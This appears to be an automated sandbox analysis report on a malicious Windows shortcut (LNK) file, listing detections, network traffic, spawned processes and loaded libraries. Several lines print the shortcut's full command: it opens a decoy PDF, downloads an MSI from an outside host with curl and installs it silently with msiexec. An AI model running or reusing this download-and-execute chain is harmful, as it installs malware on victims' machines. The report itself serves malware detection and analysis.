Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.office.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.tiktok.com/
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://www.youtube.com
Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 50261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

System Summary

Yara detected malicious lnk

Source: Yara match

File source: thUKanu6GD.lnk, type: SAMPLE

Windows shortcut file (LNK) contains suspicious command line arguments

Source: thUKanu6GD.lnk

LNK file: /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo %TEMP%\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i %TEMP%\bosfortuy.ms /qn | Taskkill /f /im cmd.exe

Source: classification engine

Classification label: mal92.phis.troj.evad.winLNK@63/301@15/14

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CB59A4-1810.pma

Jump to behavior

Source: C:\Windows\System32\curl.exe

File created: C:\Users\user\AppData\Local\Temp\bosfortuy.ms

Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe")

Source: C:\Windows\System32\cmd.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\curl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: thUKanu6GD.lnk	Virustotal: Detection: 19%
Source: thUKanu6GD.lnk	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn \| Taskkill /f /im cmd.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior

Source: thUKanu6GD.lnk

LNK file: ..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\cmd.exe

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Web Data.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Web Data.12.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Web Data.12.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Web Data.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: Web Data.12.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Web Data.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
